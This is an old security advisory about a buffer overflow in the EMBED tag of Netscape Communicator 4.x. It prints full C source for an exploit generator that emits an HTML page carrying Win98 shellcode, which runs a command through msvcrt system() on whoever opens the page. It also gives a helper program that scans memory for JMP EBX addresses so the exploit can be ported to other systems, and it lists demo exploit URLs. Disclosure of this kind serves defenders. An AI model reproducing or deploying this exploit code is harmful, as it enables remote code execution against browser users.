COMMAND
Netscape communicator
SYSTEMS AFFECTED
Netscape communicator 4.06J, 4.5J-4.6J, 4.61e
PROBLEM
DEF CON ZERO WINDOW found following. He discovered a buffer
overflow bug which causes huge security hole on the `Netscape
communicator 4.06J, 4.5J - 4.6J, 4.61e (probably, a version 3.0
after all)'. The problem of this application is in the handling
of EMBED TAG, the buffer overflow is caused if the long string is
specified at "pluginspage" option. 'defcon' coded the exploit
program to execute any command on the victim machine. He tested
it on the Windows98. However, this program specifies immediately
the address of the system() function which is defined on the
msvcrt.dll, this program does not work on the Windows machine
which is installed the other version of msvcrt.dll (This program
is for Version 6.00.83 97).
The reason 'defcon' specified the immediate address of the
function is the buffer which can be written the exploit code is
very short, the size of writable buffer is about 83 bytes. The
buffer is too small to put the code which gets the address of the
func tions which are defined on the "msvcrt.dll". However, this
problem will be solved if the code that searchs the attack code
and executes that code is put on the exploit code. The attack
code also can be written on the other buffer.
An attack code could be written in 2300 bytes to stack_bottom.
The trojan or virus can be written on the attack code, this
problem is very serious. In this case, the stack pointer (ESP)
when the overflow is caused differs by the environment. So, the
method of the RET address overwrites can not be used to exploit.
This example overwrites the handling address of the access
violation, the exploit code is called when the access violation
is caused. When the access violation is caused, the address of
the exploit buffer is stored in the EBX register. So, we
overwrite the handling address to the code that the "JMP EBX"
instruction is written.
You can quickly test this exploit. 'defcon' has prepared some
versions of exploits that execute "welcome.exe" on your Windows98
machine. If you are user of the specified version of netscape,
please test. He did not code the exploit program for the WinNT
and Win95, but they also contain same problem.
[ exploit demo page ]
exec "welcome.exe" - nc4x_ex.c
http://www.ugtop.com/defcon0/hc/nc4x_ex/nc4x_ex.cgi
exec "notepad.exe"
http://www.ugtop.com/defcon0/hc/nc4x_ex/nc4x_ex2.cgi
[ exploit test ]
blue screen(int 01h)
http://www.ugtop.com/defcon0/hc/nc4x_ex/nc4x_bs01.htm
http://www.ugtop.com/defcon0/hc/nc4x_ex/nc4x_bs01.htm
nc4x_ex.c follows:
/************************************************************************/
/* Netscape communicator 4.06J - 4.6J, 4.61e Exploit for Windows98 */
/* */
/* written by R00t Zer0(defcon0@ugtop.com) */
/* */
/* DEF CON ZERO( http://www.ugtop.com/defcon0/index.htm) */
/************************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <sys/types.h>
#include <sys/stat.h>
#define STACK_LEN ( 2135 )
#define EMBED_TYPE_LEN ( 150 )
#define XPT_HDL_OFFSET ( 588 )
#define JMPS_OFFSET ( 6 )
#define JMP_EBX_ADDR ( 0xbff7a06b )
#define INT01H_ADDR ( 0xbff73d30 )
#define NOP_CODE ( 0x90 )
#define JMPS_CODE ( 0xeb )
#define FUNCTION "msvcrt.dll.system.exit."
#define COMMAND "welcome.exe"
#define CMDLENP ( 65 )
int
main( void )
{
u_char win98_exec_code[100] = {
0xEB,0x4B,0x5B,0x53,0x32,0xE4,0x83,0xC3,0x0B,0x4B,0x88,0x23,0xB8,0x50,0x77,
0xF7,0xBF,0xFF,0xD0,0x8B,0xD0,0x52,0x43,0x53,0x52,0x32,0xE4,0x83,0xC3,0x06,
0x88,0x23,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x5A,0x43,0x53,0x52,
0x32,0xE4,0x83,0xC3,0x04,0x88,0x23,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,
0xF8,0x43,0x53,0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,0xD6,0x33,0xC0,0x50,
0xFF,0xD7,0xE8,0xB0,0xFF,0xFF,0xFF,0x00 };
u_char exploit_code[ STACK_LEN ];
u_char embed_type[ EMBED_TYPE_LEN ];
u_long ip;
int loop;
srand( ( u_int )time( 0 ) );
bzero( exploit_code, sizeof( exploit_code ) );
for( loop = 0; loop < XPT_HDL_OFFSET; loop++ )
exploit_code [loop ] = NOP_CODE;
/* make exploit code */
ip = JMP_EBX_ADDR;
exploit_code[ XPT_HDL_OFFSET - 4 ] = JMPS_CODE;
exploit_code[ XPT_HDL_OFFSET - 3 ] = JMPS_OFFSET;
exploit_code[ XPT_HDL_OFFSET + 3 ] = ( char)( 0xff & ( ip >> 24 ) );
exploit_code[ XPT_HDL_OFFSET + 2 ] = ( char)( 0xff & ( ip >> 16 ) );
exploit_code[ XPT_HDL_OFFSET + 1 ] = ( char)( 0xff & ( ip >> 8 ) );
exploit_code[ XPT_HDL_OFFSET + 0 ] = ( char)( 0xff & ( ip >> 0 ) );
win98_exec_code[ CMDLENP ] = strlen( COMMAND );
strcat( exploit_code, win98_exec_code );
strcat( exploit_code, FUNCTION );
strcat( exploit_code, COMMAND );
/* set random type */
for( loop = 0; loop < EMBED_TYPE_LEN; loop++ )
embed_type[ loop ] = 0x23 + ( rand() % 93 );
/* print html */
printf( "Content-type: text/html\n\n" );
printf( "<HTML>\n" );
printf( "<HEAD>\n" );
printf( " <TITLE>Netscape communicator 4.x Exploit!!</TITLE>\n" );
printf( "</HEAD>\n" );
printf( "<BODY>\n" );
printf( "<EMBED SRC=\"FreeUNYUN!\" PLUGINSPAGE=\"%s\" ", exploit_code );
printf( "TYPE=\"%s\" WIDTH=\"1500\" HEIGHT=\"1000\">\n", embed_type );
printf( "</EMBED>\n</BODY>\n</HTML>\n" );
return( 0 );
}
Kerb tried the URL for the notepad.exe on a Windows 95 (4.00.950a)
machine, Pentium II 266 w/ 56 MB of RAM, using Netscape
Communicator 4.05 Preview Release 1 (AWT 1.1.5) even though these
are coded for Win98. When he went there with NC 4.05, it gave him
a blue screen of death that was completely unrecoverable. He had
to reboot the system. So, basically, it is a DoS for Netscape
users, could possibly be coded into a CGI or Javascript that
checks browser version and writes the corresponding exploit code.
'UNYUN' added following. He confirmed that the exploit codes
which were published at the demo site were executed. They think
that the reason you can not confirm the executed the exploit
codes is based on the difference of the Windows kernel code. The
exploit code which is posted by R00tZer0 is for Japanese Win98,
this exploit uses the codes which is written in 0xbff7a06b. In
case Japanese Windows98, JMP EBX(FFH,E3H) code is written in such
address. If you remake the exploit code that can exploit the
specified netscape communicators, you have to change the address
which is specified in the exploit code. Maybe, you will be able
to get the address of JMP EBX code by the following program. So,
if someone succeeded or could get the address which is written
the JMP EBX code, please tell the address of JMP EBX code to see
what's up in Englisg Win98.
#include <windows.h>
#include <stdio.h>
unsigned int mems[]={
0xbfb70000,0xbfbfc000,
0xbfde0000,0xbfde6000,
0xbfdf0000,0xbfdf5000,
0xbfe00000,0xbfe10000,
0xbfe30000,0xbfe43000,
0xbfe80000,0xbfe86000,
0xbfe90000,0xbfe96000,
0xbfea0000,0xbfeb0000,
0xbfee0000,0xbfee5000,
0xbff20000,0xbff47000,
0xbff50000,0xbff61000,
0xbff70000,0xbffc6000,
0xbffc9000,0xbffe3000,
0,0};
void search_mem(FILE *fp,unsigned char *st,unsigned char *ed,
unsigned char c1,unsigned char c2)
{
unsigned char *p;
fprintf(fp,"Result : %x - %x\n",(unsigned int)st,(unsigned int)ed);
for (p=st;p<ed;p++)
if (*p==c1 && *(p+1)==c2)
fprintf(fp,"%x : %x %x %x %x\n",p,*p&255,*(p+1)&255,*(p+2)&255,*(p+3)&255);
}
int APIENTRY WinMain( HINSTANCE hInstance, HINSTANCE hPrevInstance,
LPTSTR lpCmdLine, int nCmdShow)
{
FILE *fp;
int i;
if ((fp=fopen("adr.txt","w"))!=NULL){
for (i=0;;i+=2){
if (mems[i]==0) break;
search_mem(fp,(unsigned char *)mems[i],(unsigned char *)mems[i+1],0xff,0xe3);
}
fclose(fp);
}
return 0;
}
SOLUTION
This problem can't be avoided.